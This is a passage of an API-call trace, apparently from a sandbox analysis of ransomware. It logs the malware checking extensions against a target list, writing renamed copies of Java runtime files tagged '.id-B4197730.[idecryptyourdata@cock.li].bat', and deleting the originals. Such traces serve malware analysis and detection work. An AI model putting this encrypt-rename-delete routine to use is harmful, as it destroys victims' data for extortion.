returned 1 [0200.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.600] lstrlenW (lpString=".zip") returned 4 [0200.600] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0200.600] lstrlenW (lpString=".rar") returned 4 [0200.600] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0200.600] lstrlenW (lpString=".bz2") returned 4 [0200.600] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0200.600] lstrlenW (lpString=".7z") returned 3 [0200.600] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0200.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.600] lstrlenW (lpString=".dbf") returned 4 [0200.600] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0200.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.600] lstrlenW (lpString=".1cd") returned 4 [0200.600] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0200.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.600] lstrlenW (lpString=".jpg") returned 4 [0200.600] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0200.600] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0200.600] lstrlenW (lpString="w2k_lsa_auth.dll") returned 16 [0200.600] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0200.601] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=24128) returned 1 [0200.601] CloseHandle (hObject=0x334) returned 1 [0200.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll")) returned 0x20 [0200.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.601] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0200.601] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.601] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.602] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0200.602] GetLastError () returned 0x0 [0200.602] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x5e40, lpOverlapped=0x0) returned 1 [0201.705] WriteFile (in: hFile=0x398, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x5e50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x5e50, lpOverlapped=0x0) returned 1 [0201.706] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.706] WriteFile (in: hFile=0x398, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf4, lpOverlapped=0x0) returned 1 [0201.706] SetEndOfFile (hFile=0x398) returned 1 [0201.706] CloseHandle (hObject=0x398) returned 1 [0201.706] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.706] SetEndOfFile (hFile=0x334) returned 1 [0201.707] CloseHandle (hObject=0x334) returned 1 [0201.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.708] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll")) returned 1 [0201.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.708] lstrlenW (lpString=".doc") returned 4 [0201.708] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.708] lstrlenW (lpString=".docx") returned 5 [0201.708] lstrcmpiW (lpString1=".docx", lpString2="h.dll") returned -1 [0201.708] lstrlenW (lpString=".pdf") returned 4 [0201.708] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.708] lstrlenW (lpString=".xls") returned 4 [0201.708] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.708] lstrlenW (lpString=".xlsx") returned 5 [0201.708] lstrcmpiW (lpString1=".xlsx", lpString2="h.dll") returned -1 [0201.708] lstrlenW (lpString=".ppt") returned 4 [0201.709] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.709] lstrlenW (lpString=".zip") returned 4 [0201.709] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.709] lstrlenW (lpString=".rar") returned 4 [0201.709] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.709] lstrlenW (lpString=".bz2") returned 4 [0201.709] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.709] lstrlenW (lpString=".7z") returned 3 [0201.709] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.709] lstrlenW (lpString=".dbf") returned 4 [0201.709] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.709] lstrlenW (lpString=".1cd") returned 4 [0201.709] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.709] lstrlenW (lpString=".jpg") returned 4 [0201.709] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.709] lstrlenW (lpString=".doc") returned 4 [0201.709] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.709] lstrlenW (lpString=".docx") returned 5 [0201.709] lstrcmpiW (lpString1=".docx", lpString2="h.dll") returned -1 [0201.709] lstrlenW (lpString=".pdf") returned 4 [0201.709] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.709] lstrlenW (lpString=".xls") returned 4 [0201.709] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.710] lstrlenW (lpString=".xlsx") returned 5 [0201.710] lstrcmpiW (lpString1=".xlsx", lpString2="h.dll") returned -1 [0201.710] lstrlenW (lpString=".ppt") returned 4 [0201.710] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.710] lstrlenW (lpString=".zip") returned 4 [0201.710] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.710] lstrlenW (lpString=".rar") returned 4 [0201.710] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.710] lstrlenW (lpString=".bz2") returned 4 [0201.710] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.710] lstrlenW (lpString=".7z") returned 3 [0201.710] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.710] lstrlenW (lpString=".dbf") returned 4 [0201.710] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.710] lstrlenW (lpString=".1cd") returned 4 [0201.710] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 55 [0201.710] lstrlenW (lpString=".jpg") returned 4 [0201.710] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.710] lstrcmpiW (lpString1=".0_144\\lib\\classlist", lpString2=".bat") returned -1 [0201.710] lstrlenW (lpString="classlist") returned 9 [0201.711] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0201.711] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=84355) returned 1 [0201.711] CloseHandle (hObject=0x334) returned 1 [0201.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist")) returned 0x20 [0201.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.988] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0201.988] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.988] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.989] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0201.989] GetLastError () returned 0x0 [0201.989] ReadFile (in: hFile=0x398, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x14983, lpOverlapped=0x0) returned 1 [0202.056] WriteFile (in: hFile=0x380, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x14990, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x14990, lpOverlapped=0x0) returned 1 [0202.088] ReadFile (in: hFile=0x398, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.088] WriteFile (in: hFile=0x380, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe6, lpOverlapped=0x0) returned 1 [0202.089] SetEndOfFile (hFile=0x380) returned 1 [0202.089] CloseHandle (hObject=0x380) returned 1 [0202.089] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.089] SetEndOfFile (hFile=0x398) returned 1 [0202.090] CloseHandle (hObject=0x398) returned 1 [0202.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.091] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist")) returned 1 [0202.094] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.094] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.094] lstrlenW (lpString=".doc") returned 4 [0202.094] lstrcmpiW (lpString1=".doc", lpString2="list") returned -1 [0202.094] lstrlenW (lpString=".docx") returned 5 [0202.094] lstrcmpiW (lpString1=".docx", lpString2="slist") returned -1 [0202.094] lstrlenW (lpString=".pdf") returned 4 [0202.094] lstrcmpiW (lpString1=".pdf", lpString2="list") returned -1 [0202.094] lstrlenW (lpString=".xls") returned 4 [0202.094] lstrcmpiW (lpString1=".xls", lpString2="list") returned -1 [0202.094] lstrlenW (lpString=".xlsx") returned 5 [0202.094] lstrcmpiW (lpString1=".xlsx", lpString2="slist") returned -1 [0202.094] lstrlenW (lpString=".ppt") returned 4 [0202.095] lstrcmpiW (lpString1=".ppt", lpString2="list") returned -1 [0202.095] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.095] lstrlenW (lpString=".zip") returned 4 [0202.095] lstrcmpiW (lpString1=".zip", lpString2="list") returned -1 [0202.095] lstrlenW (lpString=".rar") returned 4 [0202.095] lstrcmpiW (lpString1=".rar", lpString2="list") returned -1 [0202.095] lstrlenW (lpString=".bz2") returned 4 [0202.095] lstrcmpiW (lpString1=".bz2", lpString2="list") returned -1 [0202.095] lstrlenW (lpString=".7z") returned 3 [0202.095] lstrcmpiW (lpString1=".7z", lpString2="ist") returned -1 [0202.095] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.095] lstrlenW (lpString=".dbf") returned 4 [0202.095] lstrcmpiW (lpString1=".dbf", lpString2="list") returned -1 [0202.095] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.095] lstrlenW (lpString=".1cd") returned 4 [0202.095] lstrcmpiW (lpString1=".1cd", lpString2="list") returned -1 [0202.095] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.095] lstrlenW (lpString=".jpg") returned 4 [0202.095] lstrcmpiW (lpString1=".jpg", lpString2="list") returned -1 [0202.095] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.095] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.095] lstrlenW (lpString=".doc") returned 4 [0202.095] lstrcmpiW (lpString1=".doc", lpString2="list") returned -1 [0202.095] lstrlenW (lpString=".docx") returned 5 [0202.095] lstrcmpiW (lpString1=".docx", lpString2="slist") returned -1 [0202.095] lstrlenW (lpString=".pdf") returned 4 [0202.095] lstrcmpiW (lpString1=".pdf", lpString2="list") returned -1 [0202.096] lstrlenW (lpString=".xls") returned 4 [0202.096] lstrcmpiW (lpString1=".xls", lpString2="list") returned -1 [0202.096] lstrlenW (lpString=".xlsx") returned 5 [0202.096] lstrcmpiW (lpString1=".xlsx", lpString2="slist") returned -1 [0202.096] lstrlenW (lpString=".ppt") returned 4 [0202.096] lstrcmpiW (lpString1=".ppt", lpString2="list") returned -1 [0202.096] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.096] lstrlenW (lpString=".zip") returned 4 [0202.096] lstrcmpiW (lpString1=".zip", lpString2="list") returned -1 [0202.096] lstrlenW (lpString=".rar") returned 4 [0202.096] lstrcmpiW (lpString1=".rar", lpString2="list") returned -1 [0202.096] lstrlenW (lpString=".bz2") returned 4 [0202.096] lstrcmpiW (lpString1=".bz2", lpString2="list") returned -1 [0202.096] lstrlenW (lpString=".7z") returned 3 [0202.096] lstrcmpiW (lpString1=".7z", lpString2="ist") returned -1 [0202.096] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.096] lstrlenW (lpString=".dbf") returned 4 [0202.096] lstrcmpiW (lpString1=".dbf", lpString2="list") returned -1 [0202.096] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.096] lstrlenW (lpString=".1cd") returned 4 [0202.096] lstrcmpiW (lpString1=".1cd", lpString2="list") returned -1 [0202.096] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0202.096] lstrlenW (lpString=".jpg") returned 4 [0202.096] lstrcmpiW (lpString1=".jpg", lpString2="list") returned -1 [0202.096] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.097] lstrlenW (lpString="messages_de.properties") returned 22 [0202.097] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.127] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=3306) returned 1 [0202.128] CloseHandle (hObject=0x390) returned 1 [0202.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties")) returned 0x20 [0202.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.128] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.128] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.128] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.128] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0202.129] GetLastError () returned 0x0 [0202.129] ReadFile (in: hFile=0x390, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xcea, lpOverlapped=0x0) returned 1 [0202.208] WriteFile (in: hFile=0x330, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xcf0, lpOverlapped=0x0) returned 1 [0202.214] ReadFile (in: hFile=0x390, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.214] WriteFile (in: hFile=0x330, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x100, lpOverlapped=0x0) returned 1 [0202.214] SetEndOfFile (hFile=0x330) returned 1 [0202.215] CloseHandle (hObject=0x330) returned 1 [0202.215] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.215] SetEndOfFile (hFile=0x390) returned 1 [0202.216] CloseHandle (hObject=0x390) returned 1 [0202.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.216] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties")) returned 1 [0202.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.216] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.216] lstrlenW (lpString=".doc") returned 4 [0202.216] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.216] lstrlenW (lpString=".docx") returned 5 [0202.216] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.216] lstrlenW (lpString=".pdf") returned 4 [0202.216] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.216] lstrlenW (lpString=".xls") returned 4 [0202.216] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString=".xlsx") returned 5 [0202.217] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.217] lstrlenW (lpString=".ppt") returned 4 [0202.217] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.217] lstrlenW (lpString=".zip") returned 4 [0202.217] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString=".rar") returned 4 [0202.217] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString=".bz2") returned 4 [0202.217] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString=".7z") returned 3 [0202.217] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.217] lstrlenW (lpString=".dbf") returned 4 [0202.217] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.217] lstrlenW (lpString=".1cd") returned 4 [0202.217] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.217] lstrlenW (lpString=".jpg") returned 4 [0202.217] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.217] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.217] lstrlenW (lpString=".doc") returned 4 [0202.217] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.217] lstrlenW (lpString=".docx") returned 5 [0202.218] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.218] lstrlenW (lpString=".pdf") returned 4 [0202.218] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString=".xls") returned 4 [0202.218] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString=".xlsx") returned 5 [0202.218] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.218] lstrlenW (lpString=".ppt") returned 4 [0202.218] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.218] lstrlenW (lpString=".zip") returned 4 [0202.218] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString=".rar") returned 4 [0202.218] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString=".bz2") returned 4 [0202.218] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString=".7z") returned 3 [0202.218] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.218] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.218] lstrlenW (lpString=".dbf") returned 4 [0202.218] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.218] lstrlenW (lpString=".1cd") returned 4 [0202.218] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.218] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0202.218] lstrlenW (lpString=".jpg") returned 4 [0202.218] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.219] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.219] lstrlenW (lpString="messages_ko.properties") returned 22 [0202.219] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 